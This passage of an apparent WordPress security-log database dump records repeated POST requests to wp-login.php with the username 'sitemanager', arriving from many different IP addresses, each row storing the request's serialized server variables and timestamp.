00:00:00'),(94307,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:15:\"HTTP_USER_AGENT\";s:133:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Edg/116.0.1938.62\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"38936\";s:11:\"REMOTE_ADDR\";s:13:\"49.12.169.164\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745579455.2776611;s:12:\"REQUEST_TIME\";i:1745579455;}}','49.12.169.164',0,'2025-04-25 16:40:57','1970-01-01 00:00:00'),(94308,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"62650\";s:11:\"REMOTE_ADDR\";s:13:\"108.181.92.67\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745579855.7742441;s:12:\"REQUEST_TIME\";i:1745579855;}}','108.181.92.67',0,'2025-04-25 16:47:37','1970-01-01 00:00:00'),(94309,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"46296\";s:11:\"REMOTE_ADDR\";s:14:\"78.110.121.156\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745580248.081975;s:12:\"REQUEST_TIME\";i:1745580248;}}','78.110.121.156',0,'2025-04-25 16:54:09','1970-01-01 00:00:00'),(94310,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, br, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"43714\";s:11:\"REMOTE_ADDR\";s:12:\"163.61.72.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745581044.2479031;s:12:\"REQUEST_TIME\";i:1745581044;}}','163.61.72.36',0,'2025-04-25 17:07:26','1970-01-01 00:00:00'),(94311,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"vi-VN,vi;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49212\";s:11:\"REMOTE_ADDR\";s:13:\"68.65.123.234\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745581449.7995889;s:12:\"REQUEST_TIME\";i:1745581449;}}','68.65.123.234',0,'2025-04-25 17:14:11','1970-01-01 00:00:00'),(94312,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"el-GR,el;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42154\";s:11:\"REMOTE_ADDR\";s:12:\"64.31.53.154\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745581844.148381;s:12:\"REQUEST_TIME\";i:1745581844;}}','64.31.53.154',0,'2025-04-25 17:20:45','1970-01-01 00:00:00'),(94313,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Edg/112.0.1722.68\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56450\";s:11:\"REMOTE_ADDR\";s:14:\"65.181.111.151\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745582250.7265739;s:12:\"REQUEST_TIME\";i:1745582250;}}','65.181.111.151',0,'2025-04-25 17:27:32','1970-01-01 00:00:00'),(94314,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"sv-SE,sv;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"46330\";s:11:\"REMOTE_ADDR\";s:11:\"45.67.14.64\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745582661.2261341;s:12:\"REQUEST_TIME\";i:1745582661;}}','45.67.14.64',0,'2025-04-25 17:34:23','1970-01-01 00:00:00'),(94315,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"47844\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.114.29\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745583063.3916321;s:12:\"REQUEST_TIME\";i:1745583063;}}','198.54.114.29',0,'2025-04-25 17:41:05','1970-01-01 00:00:00'),(94316,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ja-JP,ja;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"40794\";s:11:\"REMOTE_ADDR\";s:13:\"66.102.132.28\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745583464.832494;s:12:\"REQUEST_TIME\";i:1745583464;}}','66.102.132.28',0,'2025-04-25 17:47:46','1970-01-01 00:00:00'),(94317,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51338\";s:11:\"REMOTE_ADDR\";s:13:\"103.185.75.30\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"